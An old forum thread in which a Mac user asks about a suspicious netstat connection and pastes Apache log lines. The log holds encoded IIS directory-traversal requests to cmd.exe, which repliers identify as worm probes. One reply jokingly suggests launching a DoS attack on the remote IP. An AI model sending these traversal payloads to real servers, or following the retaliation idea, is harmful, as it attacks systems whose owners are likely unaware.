Welcome to the MacNN Forums.

MasonMcD · Mar 17, 2003, 01:13 PM

Anyone know what this is (from a netstat query)?

Code:
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  *.49185                *.*                    LISTEN
tcp4       0      0  10.0.1.3.49176         213.248.29.147.http    ESTABLISHED

The 213 IP is from Russia. I just restarted my machine, I have Apache on. How can I kick him off?

Thanks for any help.

cwasko · Mar 17, 2003, 01:26 PM

Originally posted by MasonMcD:
Anyone know what this is (from a netstat query)?

Code:
Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp4 0 0 *.49185 *.* LISTEN tcp4 0 0 10.0.1.3.49176 213.248.29.147.http ESTABLISHED

The 213 IP is from Russia. I just restarted my machine, I have Apache on. How can I kick him off?

Thanks for any help.

Turn Apache off.

Enable a custom config for ipfw and deny his IP block.

Perform a DOS attack on his IP.

cwasko · Mar 17, 2003, 01:27 PM

Actualy, now that I look at it.. Isn't it your machine that is connecting to him? If it was his connecting to you... it would be on port 80 (.http) on the local machine.

[edit]

Yup:

Code:
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0    222  192.168.1.2.63116      213.248.29.147.http    ESTABLISHED

You, for some reason, are connecting to him.

JB72 · Mar 17, 2003, 01:40 PM

You, for some reason, are connecting to him.

Hehe

MasonMcD · Mar 17, 2003, 02:03 PM

But I actually restarted the machine via ssh. The browser's not even running.

Wow. Just looked at my httpd log. Maybe I should set up my firewall now.

Code:
66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe$
66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

Jerommeke · Mar 17, 2003, 02:11 PM

seems indeed like a pretty good idea. or maybe even a slight little bit too late

if it is easy to start from scratch (for instance, big backup drive), than i would recommend that option.

Moose · Mar 17, 2003, 02:20 PM

Originally posted by MasonMcD:
But I actually restarted the machine via ssh. The browser's not even running.

Wow. Just looked at my httpd log. Maybe I should set up my firewall now.

Code:
66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe$ 66.56.29.124 - - [06/Mar/2003:10:31:06 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 66.56.29.124 - - [06/Mar/2003:10:31:07 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

Heh. No need. Those are just IIS exploits. Use lsof to find out what process is bound to that port, though.

cwasko · Mar 17, 2003, 02:41 PM

Originally posted by MasonMcD:
But I actually restarted the machine via ssh. The browser's not even running.

Well, that maybe so, but netstat isn't going to lie about who is connecting to who. Your machine was accessing the 213.248.29.147 IP address on *their* port 80, not the other way around. So, it would be good to see what process was running that was initiating that connection.

Bobby · Mar 17, 2003, 03:07 PM

Russkie? Is that anywhere near the Any Key???

moki · Mar 18, 2003, 03:10 PM

Originally posted by MasonMcD:
But I actually restarted the machine via ssh. The browser's not even running.

Wow. Just looked at my httpd log. Maybe I should set up my firewall now.

Yes, setting up a firewall for any machine on a public network (which the Internet is) is a good idea. However, a firewall wouldn't prevent this -- it is just a worm attempting to propgate using known IIS security holes.

It is likely that the person who owns this computer doesn't even know this is going on.